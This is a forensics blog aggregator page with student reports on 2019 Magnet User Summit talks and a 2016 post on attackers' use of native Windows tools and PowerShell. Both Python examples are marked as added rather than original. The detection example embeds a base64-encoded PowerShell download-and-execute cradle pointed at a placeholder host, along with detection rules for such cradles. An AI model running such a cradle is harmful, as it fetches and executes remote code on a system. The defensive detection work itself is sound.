Forensic Blogs

An aggregator for digital forensics blogs

September 20, 2019 by LCDI

Magnet User Summit Experience

Thanks to Champlain College, I was able to attend this year’s Magnet User Summit. As a first-year student, I was concerned about how well I would understand the topics and concepts. However, I found that I was well prepared. My internship this semester at the LCDI helped most of all, as it provided me with knowledge not just of digital forensics, but of the work environment as well. The conference was fascinating, and I was able to learn more about the ever-changing environment of ITS.

Improvise, Adapt, and Overcome

The Improvise, Adapt, Overcome: A New Mantra for Digital Forensics Professionals lecture was presented by Cindy Murphy, president of Gillware Digital Forensics. The talk focused on challenging the unwritten rules and truths of cybersecurity and digital forensics, and on improvising, adapting, and overcoming obstacles instead. Specifically, it challenged the received wisdom about imaging, firmware, and hardware. With imaging, Murphy discussed how an image that reads as all zeros is not necessarily empty, and how a conventional hard drive image is not a complete forensic image of the drive. Murphy also stressed the importance of investigating NAND flash memory, which is often overlooked.

With firmware, Murphy discussed its role as the go-between for hardware and operating systems, and how frequently that role is underestimated. Hardware has a similar problem of being neglected in investigations. In fact, transplanting chips from damaged hardware onto identical, functioning hardware can be incredibly helpful in an investigation. Most importantly, Murphy argued that members of the ITS industry need to learn to keep moving forward in this ever-changing environment.

Guest Keynote on the Evolution of the Digital World

The guest keynote was presented by Ovie Carroll, director of the DOJ CCIPS Cybercrime Lab, SANS instructor, and author. He reflected on the evolution of the digital world and segued into the newest innovations of the modern day and what’s to come. This included Bluetooth stones and similar devices, which currently serve as miniature hotspots that relay information to passersby carrying smartphones and to cloud services. Carroll explained how the cloud adds value to the pre-search phase of investigations. Cloud storage is becoming more common, lessening the value of seizing hardware and increasing the importance of obtaining data before it can be deleted remotely. He also discussed the rising frequency of computers with encrypted storage, and the importance of RAM images, encryption, and hard drive images. We were reminded of, and given digital examples of, Locard’s exchange (evidence transfer) principle.

Discussions relating to mental health and self-confidence were brought up as well. We were reminded there’s no such thing as a full forensic investigation and that you will always miss an artifact. As a result, the investigator shouldn’t feel disheartened when their data is passed to a second pair of eyes. In fact, a collaborative approach to forensics analysis was recommended and was echoed by many in the following talks.

Powershell vs Python

The Leveraging Powershell and Python for Incident Response and Live Forensic Applications lecture was presented by Chet Hosmer, author of Python Forensics. The fundamentals, integration, and applications of both Powershell and Python were discussed. Hosmer presented Powershell as a great acquisition engine that provides digital investigators with a set of cmdlets and access to the internals of Windows, Linux, and Mac desktops and of cloud services. He presented Python as a relatively straightforward, understandable, object-oriented scripting language whose environment allows for the rapid development of new tools, deep analysis, automation, and the correlation of evidence. Hosmer then demonstrated two different integrations live. Both integrations allow for better solutions for incident response, live forensic investigation, and e-Discovery.

I was able to attend many other lectures as well, such as the Magnet Forensics keynote, the Panel of Corporate Forensics Experts, and the Axiom Essentials Lab. The conference covered a wide range of fascinating topics, yet provided a consistent environment that was friendly and inviting. Other participants were eager to speak with Champlain students and viewed us as equals, sharing tips and engaging in discussion. It’s a community that other students and I are excited to participate in, and hope to again at the next conference!

 

Blog written by Champlain College first year Hayley Froio.

Be sure to check us out on Twitter @ChampForensics, Instagram @ChampForensics, and Facebook @Champlainforensics to see other important information pertaining to our project!

The post Magnet User Summit Experience appeared first on The Leahy Center for Digital Forensics & Cybersecurity.

Read the original at: The Leahy Center for Digital Forensics & Cybersecurity

Filed Under: Digital Forensics, Uncategorized Tagged With: Champforensics, Champlain College, conference, Digital forensics, Events, LCDI, Magnet Forensics, powershell, Public Appearance, Python

September 17, 2019 by LCDI

Leveraging PowerShell & Python MUS 2019

Leveraging PowerShell & Python for Incident Response & Live Investigation With Chet Hosmer

Recently, I had the great opportunity to attend the 2019 Magnet User Summit hosted by Magnet Forensics in Nashville, Tennessee. Presenters at the Magnet User Summit dedicate their time to presenting new research, demonstrating new techniques, and teaching users in the fields of digital forensics and investigation. There were many great presentations and labs that I attended and learned so much from!

As someone who uses Windows PowerShell and Python for scripting, I took notice in a presentation called “Leveraging PowerShell & Python for Incident Response & Live Investigations” presented by Chet Hosmer, founder of Python Forensics. I was excited to find new ways to expand my knowledge of PowerShell and Python and increase my proficiency.

PowerShell and Python

Windows PowerShell is a command shell and scripting language created by Microsoft. It provides more features and functionality than the basic Windows command line. System and network administrators use PowerShell for automation, and so do forensic investigators: PowerShell excels at automation and at acquiring evidence and artifacts from a system. It has recently been made available for other operating systems, including Linux and macOS, which makes it even more powerful and useful. Python is an object-oriented scripting and programming language. It’s a simple language that’s easy for beginners but still powerful enough for more experienced users, and it has been integrated into many popular tools for digital forensics, cybersecurity, and incident response.

One point that Hosmer highlighted is that Microsoft’s PowerShell really excels at evidence and artifact acquisition, while Python is good at analysis and examination of data. Combining the two therefore creates a powerful platform for DFIR. To accomplish this, he has created two methods of integration between the two tools.

Image taken from Chet Hosmer

Integrating PowerShell and Python

The first method starts from Python: a Python script accepts the parameters as input, launches PowerShell, passes those parameters to a PowerShell script, and then reads, analyzes, and presents the results. The second method starts from PowerShell: the PowerShell script runs the acquisition cmdlets, launches Python, and pipes its results to a Python script that analyzes and organizes the data. Both methods work equally well, but someone more experienced in PowerShell may prefer the second, and vice versa. In Python, the ‘subprocess’ module launches PowerShell and passes variables through to the PowerShell script. PowerShell can feed Python through a standard pipe, like “| & $Python $Script”, and the Python side then reads the piped data from “stdin”.
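Both integration directions described above, as an added example that is not Hosmer's code or the original post's: Python drives PowerShell through subprocess (method 1), or PowerShell pipes `Get-Process | Select-Object Id,ProcessName,Path | ConvertTo-Json -Compress | & $Python $Script` into the same script, which reads stdin (method 2). The process list, the trusted-path roots, and the "suspicious path" triage rule are assumptions made for the example; the sample JSON is constructed to look like ConvertTo-Json output so the parsing runs offline.

```python
"""Couple PowerShell (acquisition) with Python (analysis) in both directions.

Method 1: Python launches PowerShell and parses the JSON it emits.
Method 2: PowerShell pipes JSON into this script, which reads stdin.
Added example; the process-list pipeline and triage rule are assumptions.
"""
import json
import re
import shutil
import subprocess
import sys

# Roots under which a process image is "expected" for this example's triage rule.
TRUSTED_ROOTS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
# Process-name filters are interpolated into a PowerShell one-liner, i.e. into
# code, so they are whitelisted first; otherwise this is command injection
# into your own collector.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_.-]+$")


def build_process_command(names=()) -> str:
    """PowerShell pipeline that acquires the process list as compact JSON."""
    for n in names:
        if not SAFE_NAME.match(n):
            raise ValueError(f"unsafe process name filter: {n!r}")
    filt = " -Name " + ",".join(f"'{n}'" for n in names) if names else ""
    return (f"Get-Process{filt} | Select-Object Id,ProcessName,Path"
            " | ConvertTo-Json -Compress")


def powershell_binary() -> str:
    """pwsh (PowerShell 7, any OS) or powershell.exe (Windows PowerShell 5.1)."""
    for name in ("pwsh", "powershell"):
        path = shutil.which(name)
        if path:
            return path
    raise FileNotFoundError("no pwsh/powershell on PATH")


def run_powershell(command: str, timeout: float = 60) -> str:
    """Method 1: launch PowerShell non-interactively and capture its stdout."""
    proc = subprocess.run(
        [powershell_binary(), "-NoProfile", "-NonInteractive", "-Command", command],
        capture_output=True, text=True, timeout=timeout, check=True)
    return proc.stdout


def parse_powershell_json(text: str) -> list:
    """ConvertTo-Json emits a bare object for one result and nothing for none."""
    text = text.strip().lstrip("\ufeff")  # defensive: drop a BOM if one sneaks in
    if not text:
        return []
    data = json.loads(text)
    return data if isinstance(data, list) else [data]


def read_from_stream(stream) -> list:
    """Method 2: the PowerShell side runs `... | ConvertTo-Json -Compress | & $Python $Script`
    and this end reads the JSON from stdin (or any object with .read())."""
    return parse_powershell_json(stream.read())


def suspicious_paths(records) -> list:
    """Simple triage: processes whose image lives outside the usual OS/program roots."""
    out = []
    for r in records:
        path = (r.get("Path") or "").lower()  # Path is null for protected/system processes
        if path and not path.startswith(TRUSTED_ROOTS):
            out.append(r)
    return out


# Constructed sample of what the PowerShell pipeline emits (not real output).
SAMPLE_JSON = json.dumps([
    {"Id": 4, "ProcessName": "System", "Path": None},
    {"Id": 1234, "ProcessName": "svchost", "Path": "C:\\Windows\\System32\\svchost.exe"},
    {"Id": 5678, "ProcessName": "update",
     "Path": "C:\\Users\\bob\\AppData\\Local\\Temp\\update.exe"},
], separators=(",", ":"))


if __name__ == "__main__":
    if not sys.stdin.isatty():       # method 2: data arrives on the pipe
        records = read_from_stream(sys.stdin)
    else:                            # method 1: go and get it ourselves
        records = parse_powershell_json(run_powershell(build_process_command(sys.argv[1:])))
    for r in suspicious_paths(records):
        print(f"{r['Id']:>6}  {r['ProcessName']:<20}  {r['Path']}")
```

One caveat for method 2 on Windows PowerShell 5.1: output piped to a native executable is encoded with `$OutputEncoding`, which defaults to ASCII there (PowerShell 7 defaults to UTF-8), so set it to UTF-8 before the pipe if paths or user names contain non-ASCII characters.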

With the rise of cloud infrastructure and international use, Hosmer also demonstrated that PowerShell is capable of interacting with and accessing Microsoft Azure logs. Azure is Microsoft’s cloud platform, built for large businesses and enterprises. The cloud has become a large source of data and potential evidence for digital investigators, but it is often harder to access and difficult to integrate into tools. To interact with Azure, the user installs a PowerShell module called ‘AzureRM’ using the ‘Install-Module’ cmdlet in PowerShell. Once it is installed, PowerShell has access to thousands of additional cmdlets dedicated to Azure. (AzureRM has since been superseded by the Az module, which Microsoft retired AzureRM in favour of in 2024; the same Install-Module pattern applies.)

Conclusion

Over my two days at Magnet User Summit, I met many professionals and had a great time attending presentations on new technologies and techniques. I also learned how to use the tools created by Magnet and improved my forensics skills. I really did learn a lot from the summit, and had plenty of fun too. I am glad I got this great opportunity to learn and network with industry professionals. Thank you to both the Leahy Center for Digital Investigation and Magnet Forensics for giving me this great opportunity.

 

Blog written by Champlain College sophomore Chris Mathieson

Be sure to check us out on Twitter @ChampForensics, Instagram @ChampForensics, and Facebook @Champlainforensics to see other important information pertaining to our project!

The post Leveraging PowerShell & Python MUS 2019 appeared first on The Leahy Center for Digital Investigation.

Read the original at: The Leahy Center for Digital Investigation

Filed Under: Digital Forensics, Uncategorized Tagged With: Champlain College, computer forensics, conference, Digital forensics, Events, LCDI, Magnet, Magnet Forensics, MUS2019, powershell, Public Appearance, Python

January 27, 2016 by Harlan Carvey

The Need for Instrumentation

Almost everyone likes spies, right?  Jason Bourne, James Bond, that sort of thing?  One of the things you don't see in the movies is the training these super spies go through, but you have to imagine that it's pretty extensive, if they can pop up in a city that they maybe haven't been to and transition seamlessly into the environment.

The same thing is true of targeted adversaries...they're able to seamlessly blend into your environment.  Like special operations forces, they learn how to use tools native to the environment in order to get the information that they're after, whether it's initial reconnaissance of the host or the infrastructure, locating items of interest, moving laterally within the infrastructure, or exfiltrating data.

I caught this post from JPCERT/CC that discusses Windows commands abused by attackers.  The author takes a different approach from previous posts and shares some of the command lines used, but also focuses on the frequency of use for each tool.  There's also a section in the post that recommends using GPOs to restrict the use of unnecessary commands.  An alternative approach might be to track attempts to use the tools, by creating a trigger to write a Windows Event Log record (discussed previously in this post).  When incorporated into an overall log management (SIEM, filtering, alerting, etc.) framework, this can be an extremely valuable detection mechanism.

If you're not familiar with some of the tools that you see listed in the JPCERT/CC blog post, try running them, starting by typing the command followed by "/?".

TradeCraft Tuesday - Episode #6 discusses how Powershell can be used and abused. The presenters (one of whom is Kyle Hanslovan) strongly encourage interaction (wow, does that sound familiar at all?) with the presentation via Twitter.  During the presentation, the guys talk about Powershell being used to push base64 encoded commands into the Registry for later use (often referred to as "fileless"), and it doesn't stop there.  Their discussion of the power of Powershell for post-exploitation activities really highlights the need for a suitable level of instrumentation in order to achieve visibility.
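The detection side of both points above (the JPCERT/CC frequency view of native tools, and encoded PowerShell for post-exploitation), as an added example that is not from this post or from the JPCERT/CC or TradeCraft Tuesday material: it runs over process-creation records, counts native tool use per tool, and decodes `-EncodedCommand` arguments (UTF-16LE, then base64) so the plaintext can be inspected. The event records are constructed to resemble Sysmon Event ID 1 / Security 4688 fields, the tool list is a representative subset chosen for the example rather than JPCERT/CC's table, and the "download cradle" rule is an assumption.

```python
"""Flag native Windows tool use and encoded PowerShell in process-creation telemetry.

Added example; events are constructed, the tool list and rules are assumptions.
"""
import base64
import binascii
import re
from collections import Counter

# Representative subset of native tools seen in intrusion recon and lateral
# movement (assumption for this example, not JPCERT/CC's full table).
NATIVE_TOOLS = {
    "tasklist", "ver", "ipconfig", "systeminfo", "net", "netstat", "whoami",
    "nbtstat", "qprocess", "quser", "wmic", "schtasks", "reg", "sc", "dsquery", "nltest",
}

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec,
# -enc, ...); the letters are validated against the full name in the decoder.
ENC_RE = re.compile(r"(?:^|\s)-e([A-Za-z]*)\s+([A-Za-z0-9+/=]+)", re.I)


def encode_powershell(script: str) -> str:
    """What the attacker (or an admin) does: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return ((start, end), plaintext) of the first valid encoded command, else None."""
    for m in ENC_RE.finditer(cmdline):
        if not "encodedcommand".startswith("e" + m.group(1).lower()):
            continue  # e.g. "-ep bypass" is -ExecutionPolicy, not -EncodedCommand
        try:
            plain = base64.b64decode(m.group(2), validate=True).decode("utf-16-le")
        except (binascii.Error, UnicodeDecodeError):
            continue
        return (m.start(), m.end()), plain
    return None


def scan_text(cmdline: str):
    """Text to inspect: the command line with any encoded blob swapped for its plaintext."""
    hit = decode_encoded_command(cmdline)
    if hit is None:
        return cmdline, None
    (start, end), plain = hit
    return cmdline[:start] + " " + cmdline[end:] + " " + plain, plain


def native_tools(text: str) -> set:
    """Tool names present anywhere on the line, so `cmd.exe /c whoami` yields whoami."""
    found = set()
    for tok in text.split():
        name = re.split(r"[\\/]", tok.strip("\"'"))[-1].lower()
        if name.endswith(".exe"):
            name = name[:-4]
        if name in NATIVE_TOOLS:
            found.add(name)
    return found


def analyze(events) -> list:
    """One finding per event that trips any rule; the decoded script is kept for the analyst."""
    findings = []
    for i, ev in enumerate(events):
        text, decoded = scan_text(ev["cmdline"])
        tools = native_tools(text)
        reasons = []
        if tools:
            reasons.append("native tool use: " + ", ".join(sorted(tools)))
        if decoded is not None:
            reasons.append("encoded PowerShell command")
        if re.search(r"downloadstring|downloadfile|invoke-webrequest|frombase64string", text, re.I):
            reasons.append("download cradle or base64 payload staging")
        if reasons:
            findings.append({"index": i, "host": ev["host"], "user": ev["user"],
                             "tools": sorted(tools), "decoded": decoded, "reasons": reasons})
    return findings


def tool_frequency(events) -> Counter:
    """Per-tool counts across the data set, in the spirit of the JPCERT/CC frequency view."""
    counts = Counter()
    for ev in events:
        text, _ = scan_text(ev["cmdline"])
        counts.update(native_tools(text))
    return counts


# Constructed sample (example.invalid never resolves); not real telemetry.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
SAMPLE_EVENTS = [
    {"host": "WS01", "user": "CORP\\alice", "parent": "explorer.exe",
     "cmdline": "cmd.exe /c whoami /all"},
    {"host": "WS01", "user": "CORP\\alice", "parent": "cmd.exe",
     "cmdline": '"C:\\Windows\\System32\\net.exe" user /domain'},
    {"host": "WS01", "user": "CORP\\alice", "parent": "cmd.exe",
     "cmdline": "tasklist /v"},
    {"host": "WS01", "user": "NT AUTHORITY\\SYSTEM", "parent": "services.exe",
     "cmdline": "C:\\Windows\\System32\\svchost.exe -k netsvcs -p"},
    {"host": "WS01", "user": "CORP\\alice", "parent": "winword.exe",
     "cmdline": "powershell.exe -NoP -NonI -W Hidden -Enc " + encode_powershell(CRADLE)},
    {"host": "FS01", "user": "CORP\\alice", "parent": "cmd.exe",
     "cmdline": "net view \\\\FS02"},
    {"host": "FS01", "user": "CORP\\alice", "parent": "cmd.exe",
     "cmdline": "C:\\Windows\\System32\\ipconfig.exe /all"},
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"[{f['index']}] {f['host']} {f['user']}: {'; '.join(f['reasons'])}")
        if f["decoded"]:
            print("     decoded:", f["decoded"])
    print(dict(tool_frequency(SAMPLE_EVENTS)))
```

The per-event output is what you would route to the SIEM; the frequency table is the baseline that tells you which of these tools your own administrators actually use, which is what makes a GPO restriction or an alert threshold defensible rather than noisy.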

The use of native commands by an adversary or intruder is not new...it's been talked about before.  For example, the guys at SecureWorks talked about the same thing in the articles Linking Users to Systems and Living off the Land.  Rather than talking about what could be done, these articles show you data that illustrates what was actually done; not might or could, but did.

So, what do you do?  Well, I've posted previously about how you can go about monitoring for command line activity, which usually manifests when access is achieved via RATs.

Not all abuse of native Windows commands and functionality is going to be as obvious as some of what's been discussed already.  Take this recent SecureWorks post for example...it illustrates how GPOs have been observed being abused by dedicated actors.  An intruder moving about your infrastructure via Terminal Services won't be as easy to detect using command line process creation monitoring, unless and until they resort to some form of non-GUI interaction.

Read the original at: Windows Incident Response

Filed Under: Digital Forensics Tagged With: command line, powershell, Windows Event Logs

About

This site aggregates posts from various digital forensics blogs. Feel free to take a look around, and make sure to visit the original sites.


All content is copyright the respective author(s)